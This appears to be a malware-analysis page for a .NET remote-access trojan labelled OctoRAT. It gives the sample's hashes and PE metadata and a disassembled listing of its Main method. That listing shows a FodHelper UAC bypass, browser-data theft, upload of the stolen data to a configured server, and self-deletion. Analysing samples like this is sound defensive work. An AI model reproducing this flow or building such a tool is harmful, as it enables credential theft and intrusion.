9a5ff998dbf0f6923d0b454d89800fb4
PE Executable | MD5: 9a5ff998dbf0f6923d0b454d89800fb4 | Size: 228.35 KB | application/x-dosexec
| Hash | Hash Value |
|---|---|
| MD5 | 9a5ff998dbf0f6923d0b454d89800fb4 |
| Sha1 | 4f4fa23e9c503b941a5e91584d6ecc3813962ba1 |
| Sha256 | 360e6f2288b6c8364159e80330b9af83f2d561929d206bc1e1e5f1585432b28f |
| Sha384 | 4de8e7453301401389a8dc13441ad8cee805eae765223bbf4bc510c9abd03f5912000684aef68639d1a10b93a8846dff |
| Sha512 | cee9cbb97f8f256a039b009bc3e0c286945d14ce80c51e5f7be51e27ddfbee2864eb7c04c33a52e4cd82767921a073075dffa3ddb4cac5cb769329f1d98b172e |
| SSDeep | 3072:y7P9YD7qHKLnO89zkxt2WpZirqaN5Eq52qPyFmrvixQhgtVA7fTFAbH+3ljZUaO7:Z7Or8rqc2q0qPyMKCes7fT2bU |
| TLSH | B324C55563F94600F2FF6F79A9B145210A73B897AC36E30E0989549E1FB3B81D821B73 |

| Name | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: C:\Users\sulum\OneDrive\Desktop\datacenter\stubCsharp\obj\Release\Client.pdb |
| Module Name | Client.exe |
| Full Name | Client.exe |
| EntryPoint | System.Void Client.Program::Main(System.String[]) |
| Scope Name | Client.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Client |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.8 |
| Total Strings | 1821 |
| Main Method | System.Void Client.Program::Main(System.String[]) |
| Main IL Instruction Count | 175 |
| Main IL | call System.Void BrowserDataExtractor.iamfine::EnsureSQLiteDLL() ldstr [{0:yyyy-MM-dd HH:mm:ss}] === RMM Client Starting === call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Boolean Client.Program::IsRunningElevated() brtrue IL_0134: ldnull call System.String Client.ResourceReader::GetConfig() stloc.2 <null> ldc.i4.0 <null> stloc.3 <null> ldloc.2 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0061: ldloc.3 ldloc.2 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 124 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.s V_4 ldloc.s V_4 ldlen <null> conv.i4 <null> ldc.i4.5 <null> blt.s IL_0061: ldloc.3 ldloc.s V_4 ldc.i4.4 <null> ldelem.ref <null> ldstr true call System.Boolean System.String::op_Equality(System.String,System.String) stloc.3 <null> ldloc.3 <null> brfalse IL_011B: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] UAC bypass disabled, browser extraction requires admin privileges" ldstr [{0:yyyy-MM-dd HH:mm:ss}] Not running as admin, attempting FodHelper UAC bypass... call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Boolean Client.Program::BypassUACFodHelper() brfalse.s IL_00AB: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] FodHelper failed, trying runas..." ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass successful, process will restart elevated call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) ldc.i4 3000 call System.Void System.Threading.Thread::Sleep(System.Int32) ret <null> ldstr [{0:yyyy-MM-dd HH:mm:ss}] FodHelper failed, trying runas... call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.s V_5 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldloc.s V_5 callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldstr runas callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> leave IL_0262: ret pop <null> ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass failed, continuing without elevation call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0134: ldnull ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass disabled, browser extraction requires admin privileges call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) ldnull <null> newobj System.Void BrowserDataExtractor.BrowserDataExtractor::.ctor(System.String) stloc.0 <null> ldloc.0 <null> callvirt System.Void BrowserDataExtractor.BrowserDataExtractor::Run() call System.String Client.ResourceReader::GetIP() stloc.s V_6 call System.String Client.ResourceReader::GetPort() stloc.s V_7 ldloc.s V_6 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0161: ldstr "127.0.0.1" ldloc.s V_7 call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_016F: ldloc.s V_7 ldstr 127.0.0.1 stloc.s V_6 ldstr 8080 stloc.s V_7 ldloc.s V_7 ldloca.s V_8 call System.Boolean System.Int32::TryParse(System.String,System.Int32&) brtrue.s IL_0181: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] Uploading browser data to {1}:{2}..." ldc.i4 8080 stloc.s V_8 ldstr [{0:yyyy-MM-dd HH:mm:ss}] Uploading browser data to {1}:{2}... call System.DateTime System.DateTime::get_Now() box System.DateTime ldloc.s V_6 ldloc.s V_8 box System.Int32 call System.String System.String::Format(System.String,System.Object,System.Object,System.Object) call System.Void System.Console::WriteLine(System.String) ldloc.0 <null> ldloc.s V_6 ldloc.s V_8 callvirt System.Boolean BrowserDataExtractor.BrowserDataExtractor::UploadToServer(System.String,System.Int32) brfalse.s IL_01CA: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] Browser data upload failed!" ldstr [{0:yyyy-MM-dd HH:mm:ss}] Browser data uploaded successfully! call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) br.s IL_01E3: leave.s IL_0209 ldstr [{0:yyyy-MM-dd HH:mm:ss}] Browser data upload failed! call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0209: ldc.i4.1 stloc.s V_9 ldstr [{0:yyyy-MM-dd HH:mm:ss}] Error uploading browser data: {1} call System.DateTime System.DateTime::get_Now() box System.DateTime ldloc.s V_9 callvirt System.String System.Exception::get_Message() call System.String System.String::Format(System.String,System.Object,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0209: ldc.i4.1 ldc.i4.1 <null> ldstr OctoRAT_Client_Mutex_{B4E5F6A7-8C9D-0E1F-2A3B-4C5D6E7F8A9B} ldloca.s V_1 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc.s V_10 ldloc.1 <null> brtrue.s IL_021D: nop leave.s IL_0262: ret nop <null> call System.Void Client.Program::Initialize() call System.Void Client.Program::Run() leave.s IL_0262: ret stloc.s V_11 ldstr Fatal error: ldloc.s V_11 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void Client.Program::WriteLog(System.String) leave.s IL_0262: ret call System.Void Client.Program::Cleanup() ldsfld System.Boolean Client.Program::meltEnabled brfalse.s IL_0255: endfinally call System.Void Client.Program::SelfDelete() endfinally <null> ldloc.s V_10 brfalse.s IL_0261: endfinally ldloc.s V_10 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null> |